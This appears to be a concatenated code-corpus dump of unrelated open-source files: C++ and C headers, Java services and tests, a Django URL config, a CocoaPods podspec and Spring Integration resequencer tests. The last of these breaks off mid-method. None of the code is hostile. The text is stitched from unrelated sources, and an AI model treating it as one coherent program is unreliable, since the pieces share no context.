    using backend_sentry_t = map_insertion_sentry_t<
        artificial_reql_cluster_interface_t::table_backends_map_t::key_type,
        artificial_reql_cluster_interface_t::table_backends_map_t::mapped_type>;

    scoped_ptr_t<auth::permissions_artificial_table_backend_t> permissions_backend[2];
    backend_sentry_t permissions_sentry;

    scoped_ptr_t<auth::users_artificial_table_backend_t> users_backend;
    backend_sentry_t users_sentry;

    scoped_ptr_t<cluster_config_artificial_table_backend_t> cluster_config_backend;
    backend_sentry_t cluster_config_sentry;

    scoped_ptr_t<db_config_artificial_table_backend_t> db_config_backend;
    backend_sentry_t db_config_sentry;

    scoped_ptr_t<issues_artificial_table_backend_t> issues_backend[2];
    backend_sentry_t issues_sentry;

    scoped_ptr_t<logs_artificial_table_backend_t> logs_backend[2];
    backend_sentry_t logs_sentry;

    scoped_ptr_t<server_config_artificial_table_backend_t> server_config_backend;
    backend_sentry_t server_config_sentry;

    scoped_ptr_t<server_status_artificial_table_backend_t> server_status_backend[2];
    backend_sentry_t server_status_sentry;

    scoped_ptr_t<stats_artificial_table_backend_t> stats_backend[2];
    backend_sentry_t stats_sentry;

    scoped_ptr_t<table_config_artificial_table_backend_t> table_config_backend[2];
    backend_sentry_t table_config_sentry;

    scoped_ptr_t<table_status_artificial_table_backend_t> table_status_backend[2];
    backend_sentry_t table_status_sentry;

    scoped_ptr_t<jobs_artificial_table_backend_t> jobs_backend[2];
    backend_sentry_t jobs_sentry;

    scoped_ptr_t<in_memory_artificial_table_backend_t> debug_scratch_backend;
    backend_sentry_t debug_scratch_sentry;

    scoped_ptr_t<debug_stats_artificial_table_backend_t> debug_stats_backend;
    backend_sentry_t debug_stats_sentry;

    scoped_ptr_t<debug_table_status_artificial_table_backend_t> debug_table_status_backend;
    backend_sentry_t debug_table_status_sentry;
};

#endif /* CLUSTERING_ADMINISTRATION_ARTIFICIAL_REQL_CLUSTER_INTERFACE_HPP_ */
6,676
6,034
<reponame>ssSlowDown/onemall
package cn.iocoder.mall.payservice.dal.mysql.dataobject.transaction;

import cn.iocoder.mall.mybatis.core.dataobject.DeletableDO;
import com.baomidou.mybatisplus.annotation.TableName;
import lombok.Data;
import lombok.EqualsAndHashCode;
import lombok.experimental.Accessors;

/**
 * Transaction extension data object, mapped to the
 * {@code pay_transaction_extension} table.
 *
 * Holds the per-channel details of one payment transaction: the order number
 * sent to the third-party payment provider and the raw data returned by its
 * asynchronous callback.
 */
@TableName("pay_transaction_extension")
@Data
@EqualsAndHashCode(callSuper = true)
@Accessors(chain = true)
public class PayTransactionExtensionDO extends DeletableDO {

    /**
     * Primary key, auto-increment.
     */
    private Integer id;
    /**
     * Transaction id {@link PayTransactionDO#getId()}
     */
    private Integer transactionId;
    /**
     * Selected payment channel.
     */
    private Integer payChannel;
    /**
     * Order number generated for and transmitted to the third-party provider.
     *
     * Unique index.
     */
    private String transactionCode;
    /**
     * Extension payload.
     *
     * Filled with the callback data when the asynchronous notification arrives.
     */
    private String extensionData;
    /**
     * IP address from which the transaction was initiated.
     */
    private String createIp;
    /**
     * Status.
     *
     * @see cn.iocoder.mall.payservice.enums.transaction.PayTransactionStatusEnum
     * Note: only the WAITING and SUCCESS values of that enum are used here.
     */
    private Integer status;
}
623
1,006
<gh_stars>1000+
/****************************************************************************
 * arch/risc-v/src/fe310/hardware/fe310_prci.h
 *
 * Licensed to the Apache Software Foundation (ASF) under one or more
 * contributor license agreements.  See the NOTICE file distributed with
 * this work for additional information regarding copyright ownership.  The
 * ASF licenses this file to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance with the
 * License.  You may obtain a copy of the License at
 *
 *   http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.  See the
 * License for the specific language governing permissions and limitations
 * under the License.
 *
 ****************************************************************************/

#ifndef __ARCH_RISCV_SRC_FE310_HARDWARE_FE310_PRCI_H
#define __ARCH_RISCV_SRC_FE310_HARDWARE_FE310_PRCI_H

/****************************************************************************
 * Pre-processor Definitions
 ****************************************************************************/

/* PRCI (clock/reset) register addresses, as offsets from FE310_PRCI_BASE
 * (FE310_PRCI_BASE is expected to be defined by the memory-map header that
 * includes this file).
 */

#define FE310_HFROSCCFG  (FE310_PRCI_BASE + 0x00)  /* HF internal ring oscillator config */
#define FE310_HFXOSCCFG  (FE310_PRCI_BASE + 0x04)  /* HF crystal oscillator config */
#define FE310_PLLCFG     (FE310_PRCI_BASE + 0x08)  /* PLL configuration */
#define FE310_PLLOUTDIV  (FE310_PRCI_BASE + 0x0c)  /* PLL output divider */

/* HFXOSCCFG bit fields */

#define HFXOSCCFG_HFXOSCEN   (0x1 << 30)  /* Enable the crystal oscillator */
#define HFXOSCCFG_HFXOSCRDY  (0x1 << 31)  /* Read-only: oscillator ready */

/* PLLCFG bit fields */

#define PLLCFG_PLLSEL        (0x1 << 16)  /* Select PLL output as hfclk source */
#define PLLCFG_PLLREFSEL     (0x1 << 17)  /* Select PLL reference clock */
#define PLLCFG_PLLBYPASS     (0x1 << 18)  /* Bypass the PLL */
#define PLLCFG_PLLLOCK       (0x1 << 31)  /* Read-only: PLL lock indicator */

#endif /* __ARCH_RISCV_SRC_FE310_HARDWARE_FE310_PRCI_H */
580
3,589
package picocli.annotation.processing.tests; import com.google.testing.compile.Compilation; import com.google.testing.compile.JavaFileObjects; import org.junit.Ignore; import org.junit.Test; import picocli.codegen.aot.graalvm.processor.NativeImageConfigGeneratorProcessor; import javax.annotation.processing.Processor; import javax.tools.StandardLocation; import static com.google.testing.compile.CompilationSubject.assertThat; import static com.google.testing.compile.Compiler.javac; import static picocli.annotation.processing.tests.Resources.slurp; import static picocli.annotation.processing.tests.YamlAssert.compareCommandYamlDump; import static picocli.codegen.aot.graalvm.processor.NativeImageConfigGeneratorProcessor.OPTION_PROJECT; public class Issue1151Test { @Test public void testIssue1151() { Processor processor = new AnnotatedCommandSourceGeneratorProcessor(); Compilation compilation = javac() .withProcessors(processor) .compile(JavaFileObjects.forResource( "picocli/issue1151/Issue1151CommandWithManPageGeneratorSubcommand.java")); assertThat(compilation).succeeded(); } @Test public void testGenerateReflectConfigIssue1151() { NativeImageConfigGeneratorProcessor processor = new NativeImageConfigGeneratorProcessor(); Compilation compilation = javac() .withProcessors(processor) .withOptions("-A" + OPTION_PROJECT + "=issue1151") .compile(JavaFileObjects.forSourceLines( "picocli.issue1151.Issue1151CommandWithManPageGeneratorSubcommand", slurp("/picocli/issue1151/Issue1151CommandWithManPageGeneratorSubcommand.java"))//, ); assertThat(compilation).succeeded(); assertThat(compilation) .generatedFile(StandardLocation.CLASS_OUTPUT, "META-INF/native-image/picocli-generated/issue1151/reflect-config.json") .contentsAsUtf8String().isEqualTo(slurp("/picocli/issue1151/issue1151-reflect-config.json")); assertThat(compilation).hadWarningCount(0); // #826 version warnings are now suppressed } }
975
394
# Root URL configuration for the project.
# NOTE: pattern order is significant — Django resolves against the first match.
from django.conf.urls import include,url
from django.contrib import admin
from names.views import index,login_view,logout
# NOTE(review): handler404/handler500 are imported but never assigned here —
# presumably intended as custom error handlers; confirm or remove.
from django.conf.urls import handler404, handler500
from asset.views import AssetUpload
from django.conf import settings
from django.urls import path

# xadmin must discover registered models before its urls are mounted.
import xadmin
xadmin.autodiscover()

# Enable xadmin's model-versioning plugin.
from xadmin.plugins import xversion
xversion.register_models()

urlpatterns = [
    # Admin backends: xadmin is the primary admin, the stock Django admin
    # stays available under /dadmin/.
    path('admin/', xadmin.site.urls, name="xadmin"),
    path('dadmin/', admin.site.urls,name="dadmin"),
    # Landing / auth pages.
    path('', index),
    path('login.html', login_view,name="login_view"),
    path('logout.html', logout,name="logout"),
    path('index.html', index),
    # Feature apps, each with its own namespaced urlconf.
    path('asset/', include('asset.urls', namespace="asset", ), ),
    path('db/', include('db.urls', namespace="db", ), ),
    path('tasks/', include('tasks.urls', namespace="tasks",), ),
    path('names/', include('names.urls', namespace="names",), ),
    path('library/', include('library.urls', namespace="library",), ),
    # File upload endpoint (class-based view).
    path('upload/', AssetUpload.as_view()),
    # Rich-text editor assets/endpoints.
    path('ueditor/',include('DjangoUeditor.urls' )),
    path('release/', include('release.urls', namespace="release")),
]

# Serve user-uploaded media from Django itself during development only.
if settings.DEBUG:
    from django.conf.urls.static import static
    urlpatterns += static( settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
505
3,151
package com.rarchives.ripme.tst.ripper.rippers;

import java.io.IOException;
import java.net.URL;

import com.rarchives.ripme.ripper.rippers.ManganeloRipper;
import org.junit.jupiter.api.Assertions;
import org.junit.jupiter.api.Disabled;
import org.junit.jupiter.api.Test;

/**
 * Tests for {@link ManganeloRipper}.
 */
public class ManganeloRipperTest extends RippersTest {

    /** Manga album URL shared by all tests in this class. */
    private static final String ALBUM_URL = "https://manganelo.com/manga/demonic_housekeeper";

    @Test
    @Disabled("no images found, test or ripper broken")
    public void testRip() throws IOException {
        // End-to-end rip of the test album (currently disabled upstream).
        testRipper(new ManganeloRipper(new URL(ALBUM_URL)));
    }

    @Test
    public void testGetGID() throws IOException {
        // The GID is the final path segment of the manga URL.
        URL albumUrl = new URL(ALBUM_URL);
        ManganeloRipper ripper = new ManganeloRipper(albumUrl);
        Assertions.assertEquals("demonic_housekeeper", ripper.getGID(albumUrl));
    }
}
337
542
<filename>manager/manager-core/src/main/java/cn/vbill/middleware/porter/manager/service/impl/NodesOwnerServiceImpl.java
/*
 * Copyright ©2018 vbill.cn.
 * <p>
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 * </p>
 */

package cn.vbill.middleware.porter.manager.service.impl;

import cn.vbill.middleware.porter.manager.core.dto.ControlPageVo;
import cn.vbill.middleware.porter.manager.core.dto.ControlSettingVo;
import cn.vbill.middleware.porter.manager.core.dto.OwnerVo;
import cn.vbill.middleware.porter.manager.core.entity.CUser;
import cn.vbill.middleware.porter.manager.core.entity.DicControlTypePlugin;
import cn.vbill.middleware.porter.manager.core.entity.NodesOwner;
import cn.vbill.middleware.porter.manager.core.mapper.NodesOwnerMapper;
import cn.vbill.middleware.porter.manager.service.CUserService;
import cn.vbill.middleware.porter.manager.service.DicControlTypePluginService;
import cn.vbill.middleware.porter.manager.service.DictService;
import cn.vbill.middleware.porter.manager.service.NodesOwnerService;
import cn.vbill.middleware.porter.manager.web.rcc.RoleCheckContext;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;

import java.util.ArrayList;
import java.util.List;
import java.util.Map;

/**
 * Node ownership control service implementation.
 *
 * Ownership type conventions used throughout this class:
 * ownerType = 1 means "node owner", ownerType = 2 means "node sharer".
 *
 * @author: FairyHood
 * @date: 2019-03-20 16:29:06
 * @version: V1.0-auto
 * @review: FairyHood/2019-03-20 16:29:06
 */
@Service
public class NodesOwnerServiceImpl implements NodesOwnerService {

    private static final Logger LOGGER = LoggerFactory.getLogger(NodesOwnerServiceImpl.class);

    @Autowired
    private NodesOwnerMapper nodesOwnerMapper;

    @Autowired
    private CUserService cUserService;

    @Autowired
    private DictService dictService;

    @Autowired
    protected DicControlTypePluginService dicControlTypePluginService;

    /**
     * Returns only the owner/sharer information of a node (no operation
     * buttons or control-type dictionary).
     *
     * @param nodeId node identifier
     * @return page VO with owner and sharers; dictionary fields are null
     */
    @Override
    public ControlPageVo findOwnerByNodeId(String nodeId) {
        // ownerType=1: node owner; ownerType=2: node sharer.
        OwnerVo owner = checkOwner(cUserService.selectOwnersByNodeId(nodeId, 1));
        List<OwnerVo> shareOwner = checkShares(cUserService.selectOwnersByNodeId(nodeId, 2));
        // Assemble the ControlPageVo and return it.
        ControlPageVo controlPageVo = new ControlPageVo(owner, shareOwner, null, null);
        return controlPageVo;
    }

    /**
     * Builds the full control page for a node: owner, sharers, the
     * control-type dictionary and the operation buttons available to the
     * currently logged-in user.
     *
     * @param nodeId node identifier
     * @return fully populated control page VO
     */
    @Override
    public ControlPageVo makeControlPage(String nodeId) {
        // ownerType=1: node owner; ownerType=2: node sharer.
        OwnerVo owner = checkOwner(cUserService.selectOwnersByNodeId(nodeId, 1));
        List<OwnerVo> shareOwner = checkShares(cUserService.selectOwnersByNodeId(nodeId, 2));
        // Control-type dictionary.
        Map<String, Object> dictControlType = dictService.dictControlType();
        // Resolve the current user's relationship to the node; administrators
        // get type 0 regardless of ownership.
        Boolean isManager = checkLoginRole();
        Integer type = isManager ? 0
                : nodesOwnerMapper.findOwnerTypeByNodeIdAndUserId(nodeId,
                        RoleCheckContext.getUserIdHolder().getUserId());
        // Operation buttons permitted for that relationship type.
        List<DicControlTypePlugin> dicControlTypePlugins = dicControlTypePluginService.findByType(type);
        // Assemble the ControlPageVo and return it.
        ControlPageVo controlPageVo = new ControlPageVo(owner, shareOwner, dictControlType, dicControlTypePlugins);
        return controlPageVo;
    }

    /**
     * Applies an ownership-control operation (transfer, share, cancel or one
     * of the recycle variants) to a node.
     *
     * @param controlSettingVo operation descriptor: node id, operation enum
     *                         and target user ids
     * @return number of affected rows, or null when the operation type is
     *         missing/unknown
     */
    @Override
    public Integer nodeOwnerSetting(ControlSettingVo controlSettingVo) {
        String controlType = null;
        if (null != controlSettingVo.getControlTypeEnum()) {
            controlType = controlSettingVo.getControlTypeEnum().getCode();
        }
        // BUGFIX: switching on a null String throws NullPointerException, so
        // the original default-branch error handling was unreachable when the
        // enum was absent.  Handle the null case explicitly instead.
        if (controlType == null) {
            LOGGER.error("ControlType为null!!");
            return null;
        }
        switch (controlType) {
            // Transfer ownership.
            case "CHANGE":
                Integer changeNum = nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 1, null);
                if (!controlSettingVo.getToUserIds().isEmpty()) {
                    // Check whether the prospective owner is currently a sharer of this node.
                    Integer type = nodesOwnerMapper.findOwnerTypeByNodeIdAndUserId(controlSettingVo.getNodeId(),
                            controlSettingVo.getToUserIds().get(0));
                    if (type != null && type == 2) {
                        // Promote: drop the share entry before inserting ownership.
                        nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 2,
                                controlSettingVo.getToUserIds().get(0));
                    }
                    nodesOwnerMapper.batchInsert(controlSettingVo.getToUserIds(), controlSettingVo.getNodeId(), 1);
                }
                // BUGFIX: log the whole list instead of get(0) — the original
                // threw IndexOutOfBoundsException when toUserIds was empty.
                LOGGER.info("移交节点[{}],操作者用户ID:[{}],授权者用户ID:[{}]", controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId(), controlSettingVo.getToUserIds());
                return changeNum;
            // Share the node.
            case "SHARE":
                Integer shareNum = nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 2, null);
                if (!controlSettingVo.getToUserIds().isEmpty()) {
                    nodesOwnerMapper.batchInsert(controlSettingVo.getToUserIds(), controlSettingVo.getNodeId(), 2);
                }
                LOGGER.info("共享节点[{}],操作者用户ID:[{}],授权者用户ID:[{}]", controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId(), controlSettingVo.getToUserIds());
                return shareNum;
            // Give up one's own relationship to the node.
            case "CANCEL":
                Integer type = nodesOwnerMapper.findOwnerTypeByNodeIdAndUserId(controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId());
                LOGGER.info("放弃节点[{}],操作者用户ID:[{}]", controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId());
                return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), type,
                        RoleCheckContext.getUserIdHolder().getUserId());
            // Recycle the owner (admin operation).
            case "RECYCLE_C":
                LOGGER.info("回收节点所有者,节点id[{}],操作者管理员ID:[{}]", controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId());
                return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 1, null);
            // Recycle the sharers (admin operation).
            case "RECYCLE_S":
                LOGGER.info("回收节点所有者,节点id[{}],操作者管理员ID:[{}]", controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId());
                return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), 2, null);
            // Recycle all permissions (admin operation).
            case "RECYCLE_A":
                LOGGER.info("回收节点权限,节点id[{}],操作者管理员ID:[{}]", controlSettingVo.getNodeId(),
                        RoleCheckContext.getUserIdHolder().getUserId());
                return nodesOwnerMapper.delete(controlSettingVo.getNodeId(), null, null);
            default:
                LOGGER.error("ControlType为null!!");
                return null;
        }
    }

    /**
     * Wraps the node-owner query result into an OwnerVo.
     *
     * NOTE: deliberately returns null (not an empty VO) when the node has no
     * owner — callers pass this straight into ControlPageVo.
     *
     * @param userOwner users holding ownerType=1 for the node
     * @return owner VO, or null when the node has no owner
     */
    private OwnerVo checkOwner(List<CUser> userOwner) {
        return userOwner.isEmpty() ? null : new OwnerVo(userOwner.get(0), 1);
    }

    /**
     * Wraps the node-sharer query result into OwnerVo instances.
     *
     * NOTE: deliberately returns null (not an empty list) when the node has
     * no sharers — callers pass this straight into ControlPageVo.
     *
     * @param userShares users holding ownerType=2 for the node
     * @return sharer VOs, or null when the node has no sharers
     */
    private List<OwnerVo> checkShares(List<CUser> userShares) {
        if (userShares.isEmpty()) {
            return null;
        }
        List<OwnerVo> shareOnwer = new ArrayList<>();
        for (CUser userShare : userShares) {
            OwnerVo owner = new OwnerVo(userShare, 2);
            shareOnwer.add(owner);
        }
        return shareOnwer;
    }

    /**
     * Checks whether the currently logged-in user is an administrator.
     *
     * @return true for role codes A0001 / A0002 (administrator roles)
     */
    private Boolean checkLoginRole() {
        String roleCode = RoleCheckContext.getUserIdHolder().getRoleCode();
        return ("A0001".equals(roleCode) || "A0002".equals(roleCode));
    }

    /**
     * Records the current user as the owner of a newly created node.
     *
     * @param nodeId node identifier
     */
    @Override
    public void insertByNodes(String nodeId) {
        NodesOwner nodesOwner = new NodesOwner();
        nodesOwner.setNodeId(nodeId);
        nodesOwner.setOwnerId(RoleCheckContext.getUserIdHolder().getUserId());
        nodesOwnerMapper.insert(nodesOwner);
    }
}
4,020
5,169
<filename>Specs/9/c/1/WRService/0.1.0/WRService.podspec.json { "name": "WRService", "version": "0.1.0", "summary": "WRService is light and convinient tool for working with an API via NSURLSession for most of applications.", "description": "# WRService\n\nWRService is light and convinient tool for working with an API via NSURLSession for most of applications.\n\nStandart configuration has 2 queues: default and background. Background queue has less priority than standart queue. Each quque is represented as an NSURLSession instance. \n\nYou get internet data throuth WROperations. There is an example:\n\n NSURL *url = [NSURL URLWithString:@\"http://speedtest.ftp.otenet.gr/files/test100Mb.db\"];\n \n WROperation *op = [[WROperation alloc] initWithUrl:url];\n \n [[WRService shared] execute:op onSuccess:^(WROperation * _Nonnull op, NSData * _Nonnull data) {\n NSLog(@\"Backgound task is READY! %@\", op);\n } onFail:^(WROperation * _Nonnull op, NSError * _Nonnull error) {\n NSLog(@\"Fail error: %@\", error);\n }];\n\n\n\nYou can get progress via block or delegate. Example:\n\n op.progressCallback = ^(float progress) {\n NSLog(@\"Progress: %f\", progress);\n };\n \n\nIf you emplemented WRObjectOperationProtocol to your class you can get result as your class instance or array of your class instanse. Example:\n\n NSURL *url = [NSURL URLWithString:@\"http://ip.jsontest.com\"];\n NSURLRequest *req = [NSURLRequest requestWithURL:url];\n \n WRObjectOperation * objOp = [[WRObjectOperation alloc] initWithRequest:req resultClass:[Article class]];\n \n [[WRService shared] execute:objOp onSuccess:^(WROperation * _Nonnull op, Article _Nonnull result) {\n NSLog(@\"Article: %@\", result);\n } onFail:^(WROperation * _Nonnull op, NSError * _Nonnull error) {\n NSLog(@\"Error: %@\", error);\n }];\n\nWROperation.\n------------\n\nEach WROperation has priority property. 
There are three types of priority: \nWROperationPriorityDefault, WROperationPriorityBackground, WROperationPriorityExclusive.\n\nIf you start an operation with Exclusive priority all task (except Exclusive) will be suspended. \nSuspended tasks will continue work after all exclusive tasks is finished.\n\n\nJSON encoding and decoding.\n--------------------------\nAnd if you want have the fastest way for creating class which will be decoded from JSON use NSObject_WRJSON category for generating Objective-C class from JSON object. Example:\n\n NSURL *url = [NSURL URLWithString:@\"https://api.github.com/events\"];\n NSURLRequest *req = [NSURLRequest requestWithURL:url];\n \n WRObjectOperation *op = [[WRObjectOperation alloc] initWithRequest:req];\n \n [[WRService shared] execute:op onSuccess:^(WROperation * _Nonnull op, NSData* _Nonnull result) {\n \n id json = [NSJSONSerialization JSONObjectWithData:result options:0 error:nil];\n if (json) {\n NSString *classInterface = [NSObject wrGenerateClass:@\"GitHubEvent\" fromJSON:json];\n NSLog(@\"%@\", classInterface);\n }\n } onFail:nil];\n \n \n /* Result of NSLog: */\n\n@class Repo, Actor, Payload;@interface GitHubEvent : NSObject\n\n@property (nonatomic, strong) Repo *repo;@property (nonatomic, strong) Actor *actor;@property (nonatomic, assign) short public;@property (nonatomic, assign) NSInteger id;@property (nonatomic, copy) NSString *created_at;@property (nonatomic, strong) Payload *payload;@property (nonatomic, copy) NSString *type;@end\n\n\n@interface Repo : NSObject\n\n@property (nonatomic, assign) NSInteger id;@property (nonatomic, copy) NSString *name;@property (nonatomic, copy) NSString *url;@end\n\n\n@interface Actor : NSObject\n\n@property (nonatomic, copy) NSString *display_login;@property (nonatomic, assign) NSInteger id;@property (nonatomic, copy) NSString *login;@property (nonatomic, copy) NSString *avatar_url;@property (nonatomic, copy) NSString *url;@property (nonatomic, copy) NSString 
*gravatar_id;@end\n\n@interface Payload : NSObject\n\n@property (nonatomic, copy) NSString *before;@property (nonatomic, copy) NSString *ref;@property (nonatomic, assign) NSInteger push_id;@property (nonatomic, assign) NSInteger size;@property (nonatomic, assign) NSInteger distinct_size;@property (nonatomic, copy) NSString *head;@end", "homepage": "https://github.com/beastgrim/WRService", "license": { "type": "MIT", "file": "LICENSE" }, "authors": { "beastgrim": "<EMAIL>" }, "source": { "git": "https://github.com/beastgrim/WRService.git", "branch": "0.1.0", "tag": "0.1.0" }, "platforms": { "ios": "8.0", "osx": "10.8", "tvos": "9.0" }, "source_files": "WRService/Classes/**/*" }
1,717
1,093
/* * Copyright 2002-2021 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.springframework.integration.aggregator; import static org.assertj.core.api.Assertions.assertThat; import static org.assertj.core.api.Assertions.fail; import static org.mockito.Mockito.mock; import java.util.ArrayList; import java.util.Arrays; import java.util.Collections; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import org.springframework.beans.factory.BeanFactory; import org.springframework.expression.spel.standard.SpelExpressionParser; import org.springframework.integration.IntegrationMessageHeaderAccessor; import org.springframework.integration.channel.QueueChannel; import org.springframework.integration.store.MessageGroupStore; import org.springframework.integration.store.SimpleMessageStore; import org.springframework.integration.support.MessageBuilder; import org.springframework.messaging.Message; import org.springframework.messaging.MessageChannel; import org.springframework.messaging.MessagingException; import org.springframework.scheduling.concurrent.ThreadPoolTaskScheduler; /** * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> * @author <NAME> */ public class ResequencerTests { private ResequencingMessageHandler resequencer; private final ResequencingMessageGroupProcessor processor = new ResequencingMessageGroupProcessor(); private final MessageGroupStore store = new 
SimpleMessageStore(); @BeforeEach public void configureResequencer() { this.resequencer = new ResequencingMessageHandler(processor, store, null, null); this.resequencer.setBeanFactory(mock(BeanFactory.class)); this.resequencer.afterPropertiesSet(); } @Test public void testBasicResequencing() { QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 3, 3, replyChannel); Message<?> message2 = createMessage("456", "ABC", 3, 1, replyChannel); Message<?> message3 = createMessage("789", "ABC", 3, 2, replyChannel); this.resequencer.handleMessage(message1); this.resequencer.handleMessage(message3); this.resequencer.handleMessage(message2); Message<?> reply1 = replyChannel.receive(0); Message<?> reply2 = replyChannel.receive(0); Message<?> reply3 = replyChannel.receive(0); assertThat(reply1).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1); assertThat(reply2).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2); assertThat(reply3).isNotNull(); assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3); } @Test public void testBasicResequencingA() { SequenceSizeReleaseStrategy releaseStrategy = new SequenceSizeReleaseStrategy(); releaseStrategy.setReleasePartialSequences(true); this.resequencer = new ResequencingMessageHandler(processor, store, null, releaseStrategy); this.resequencer.setBeanFactory(mock(BeanFactory.class)); this.resequencer.afterPropertiesSet(); QueueChannel replyChannel = new QueueChannel(); Message<?> message1 = createMessage("123", "ABC", 3, 1, replyChannel); Message<?> message3 = createMessage("789", "ABC", 3, 3, replyChannel); this.resequencer.handleMessage(message3); assertThat(replyChannel.receive(0)).isNull(); this.resequencer.handleMessage(message1); assertThat(replyChannel.receive(0)).isNotNull(); assertThat(replyChannel.receive(0)).isNull(); } @Test public void 
// NOTE(review): this span begins inside the enclosing resequencer test class; the
// '@Test public void' modifiers of the first method are on a line above this view.
// Only comments were added and the collapsed formatting expanded — all code tokens
// are unchanged.
// Resequencing with SequenceSizeReleaseStrategy in partial-release mode and a
// constant correlation key ("A"); messages carry only sequence numbers (no
// sequence-size header), so releases happen as contiguous runs become available.
testBasicUnboundedResequencing() {
	SequenceSizeReleaseStrategy releaseStrategy = new SequenceSizeReleaseStrategy();
	releaseStrategy.setReleasePartialSequences(true);
	this.resequencer = new ResequencingMessageHandler(processor, store, null, releaseStrategy);
	QueueChannel replyChannel = new QueueChannel();
	// Every message correlates to the same group regardless of headers.
	this.resequencer.setCorrelationStrategy(message -> "A");
	this.resequencer.setBeanFactory(mock(BeanFactory.class));
	this.resequencer.afterPropertiesSet();
	//Message<?> message0 = MessageBuilder.withPayload("0").setSequenceNumber(0).build();
	Message<?> message1 = MessageBuilder.withPayload("1").setSequenceNumber(1).setReplyChannel(replyChannel).build();
	Message<?> message2 = MessageBuilder.withPayload("2").setSequenceNumber(2).setReplyChannel(replyChannel).build();
	Message<?> message3 = MessageBuilder.withPayload("3").setSequenceNumber(3).setReplyChannel(replyChannel).build();
	Message<?> message4 = MessageBuilder.withPayload("4").setSequenceNumber(4).setReplyChannel(replyChannel).build();
	Message<?> message5 = MessageBuilder.withPayload("5").setSequenceNumber(5).setReplyChannel(replyChannel).build();
	// 3 alone: nothing releasable yet.
	this.resequencer.handleMessage(message3);
	assertThat(replyChannel.receive(0)).isNull();
	// 1 arrives: 1 is released immediately.
	this.resequencer.handleMessage(message1);
	assertThat(replyChannel.receive(0)).isNotNull();
	// 2 arrives: 2 and the buffered 3 are released together.
	this.resequencer.handleMessage(message2);
	assertThat(replyChannel.receive(0)).isNotNull();
	assertThat(replyChannel.receive(0)).isNotNull();
	assertThat(replyChannel.receive(0)).isNull();
	// 5 is out of order and must wait for 4.
	this.resequencer.handleMessage(message5);
	assertThat(replyChannel.receive(0)).isNull();
	this.resequencer.handleMessage(message4);
	assertThat(replyChannel.receive(0)).isNotNull();
}

// A duplicate delivery (message3 handled twice) must not produce a duplicate
// release; exactly three replies come out, in sequence order 1, 2, 3.
@Test
public void testResequencingWithDuplicateMessages() {
	QueueChannel replyChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 3, 3, replyChannel);
	Message<?> message2 = createMessage("456", "ABC", 3, 1, replyChannel);
	Message<?> message3 = createMessage("789", "ABC", 3, 2, replyChannel);
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message3);
	this.resequencer.handleMessage(message3); // duplicate of sequence number 2
	this.resequencer.handleMessage(message2);
	Message<?> reply1 = replyChannel.receive(0);
	Message<?> reply2 = replyChannel.receive(0);
	Message<?> reply3 = replyChannel.receive(0);
	assertThat(reply1).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply1).getSequenceNumber()).isEqualTo(1);
	assertThat(reply2).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply2).getSequenceNumber()).isEqualTo(2);
	assertThat(reply3).isNotNull();
	assertThat(new IntegrationMessageHeaderAccessor(reply3).getSequenceNumber()).isEqualTo(3);
}

// Partial release keeps the store small enough that a 4-message sequence fits
// through a store capped at 3 messages: 1 and 2 are released early, then 3 and 4
// complete the sequence.
@Test
public void testResequencingWithIncompleteSequenceRelease() {
	this.resequencer.setReleaseStrategy(new SequenceSizeReleaseStrategy(true));
	// INT-3846
	this.resequencer.setMessageStore(new SimpleMessageStore(3));
	QueueChannel replyChannel = new QueueChannel();
	Message<?> message1 = createMessage("123", "ABC", 4, 4, replyChannel);
	Message<?> message2 = createMessage("456", "ABC", 4, 2, replyChannel);
	Message<?> message3 = createMessage("789", "ABC", 4, 1, replyChannel); // release 2 after this one
	Message<?> message4 = createMessage("XYZ", "ABC", 4, 3, replyChannel);
	this.resequencer.handleMessage(message1);
	this.resequencer.handleMessage(message2);
	this.resequencer.handleMessage(message3);
	Message<?> reply1 = replyChannel.receive(0);
	Message<?> reply2 = replyChannel.receive(0);
